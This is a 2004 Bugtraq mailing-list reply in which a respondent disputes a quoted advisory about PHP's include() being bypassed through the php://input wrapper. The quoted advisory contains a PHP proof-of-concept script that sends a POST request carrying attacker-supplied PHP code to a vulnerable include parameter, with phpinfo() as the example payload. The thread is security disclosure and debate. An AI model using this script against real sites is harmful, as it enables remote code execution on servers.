lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Thu, 27 May 2004 22:51:20 -0600
From: Keary Suska <hierophant@...sys.net>
To: <bugtraq@...urityfocus.com>
Subject: Re: [PHP] include() bypassing filter with php://input


What exactly does your "proof of concept" do? I tried this on my system with
PHP 4.34.x--which, by the way, is when support for php://input began, *not*
3.0.13--and nothing happened whatsoever. Where's the proof?

on 5/27/04 3:07 AM, lostnoobs@...urity-challenge.com purportedly said:

> 
> 
> Informations : 
> °°°°°°°°°°°°°° 
> Website : http://www.php.net
> Version : PHP 3.0.13 =>
> Problem : Inlude() bypassing filter
> 
> 
> Proof of concept:
> °°°°°°°° Exploit °°°°°°°°°
> <------------ cut here ---------------->
> <form action="" methode="post" >
> target server : <input type="text" name="server" ><br>
> file : <input type="text" name="file" ><br>
> exec : <input type="text" name="cmd" ><br>
> <INPUT type="submit" value="send">
> </form>
> 
> <?
> if($cmd){
> $message  = "POST /".$file."php://input HTTP/1.1\r\n";
> $message .= "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
> application/x-shockwave-flash, */*\r\n";
> $message .= "Accept-Language: fr\r\n";
> $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
> $message .= "Accept-Encoding: deflate\r\n";
> $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;
> MyIE2)\r\n";
> $message .= "Host: ".$server."\r\n";
> $message .= "Content-length: ".strlen( $cmd )."\r\n";
> $message .= "Connection: Keep-Alive\r\n";
> $message .= "Cache-Control: no-cache\r\n";
> $message .= "\r\n";
> $message .= $cmd."\r\n";
> $fd = fsockopen( $server, 80 );
> fputs($fd,$message);
> while(!feof($fd)) {
> echo fgets($fd,1280);
> }
> fclose($fd);
> }
> ?>
> <------------ cut here ---------------->
> 
> target server = "www.exemple.com"
> file = "index.php?page="
> exec = "<? phpinfo(); ?>"
> 
> Explaination
> °°°°°°°°°°°°°°
> You can bypassing filter protection who parse http:// or ftp:// ...
> "php://input" allows to put data in the function include() by sending a
> request with code php in POST methode.
> 
> 
> For More details :
> °°°°°°°°°°°°°° 
> http://fr2.php.net/manual/en/wrappers.php.php
> irc.fr.worldnet.net #s-c
> 
> Nourredine Himeur
> 
> www.security-challenge.com
> 
> This vulnerability was found by Slythers but he's too shy for publish the vuln
> ;)
> 
> greetz : mum , daddy , tcpteam , Nyx
> 
> 
> 


Keary Suska
Esoteritech, Inc.
"Leveraging Open Source for a better Internet"



Powered by blists - more mailing lists